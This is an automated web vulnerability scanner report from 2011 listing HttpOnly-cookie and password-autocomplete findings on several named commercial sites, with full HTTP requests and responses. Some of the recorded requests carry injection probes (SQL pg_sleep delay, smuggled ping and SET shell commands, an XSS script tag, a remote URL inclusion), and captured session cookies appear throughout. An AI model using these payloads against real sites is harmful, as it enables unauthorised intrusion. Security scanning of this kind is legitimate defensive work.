<title>Tresware Contact Us | Web Development | Web Design, Managed Web Hosting |
...[SNIP]...

16.205. http://www.tresware.com/webcontentmanagementNJ.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /webcontentmanagementNJ.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webcontentmanagementNJ.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/CustomPHPProgrammingNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733986

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:53 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733993; expires=Mon, 25-Apr-2011 12:29:53 GMT; path=/
Content-Type: text/html
Content-Length: 14368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Web Content Management | Webpage Editing | Content Management | CMS | Real
...[SNIP]...

17. Password field with autocomplete enabled  previous  next
There are 296 instances of this issue:


17.1. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
<td width=0 height=0 align='left' valign='top' style='display:none'>
<form method='post' name='login' id='login' action='/app/site/backend/customerlogin.nl' onkeypress='if (getEventKeypress(event) == 13) {if (getEventTargetType(event) == "textarea") return true;document.forms.login.submit(); event.cancelBubble=true; return false;}'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="retpwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="retpwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}return this.isvalid;" name="retpwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...

17.2. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
</form>
<form method='post' name='newcust' id='newcust' action='/app/site/backend/customerlogin.nl?newcust=T'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="pwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="pwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="pwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...
<span style="white-space: nowrap" id="newpwd2_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="newpwd2" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="newpwd2" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...

17.3. https://customer.kronos.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; Visitor=173%2E193%2E214%2E243; mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303740970638; s_invisit=true; s_lv=1303740970641; s_lv_s=First%20Visit; s_gpv_page=kronos%3Alabor-analysis%3Alabor-analysis-software.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>


<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...

17.4. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Default.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>


<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...

17.5. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>

<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...

17.6. http://direct.yandex.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;amp;from=direct&amp;amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>

<input name="login"/>
<input name="passwd" type="password"/>
<input name="twoweeks" type="checkbox" value="yes"/>
...[SNIP]...

17.7. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...

17.8. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.9. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.10. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26expr+268409241%20-%202%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.11. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.12. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000F)%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000f)%3c%2fscript%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.13. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.14. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
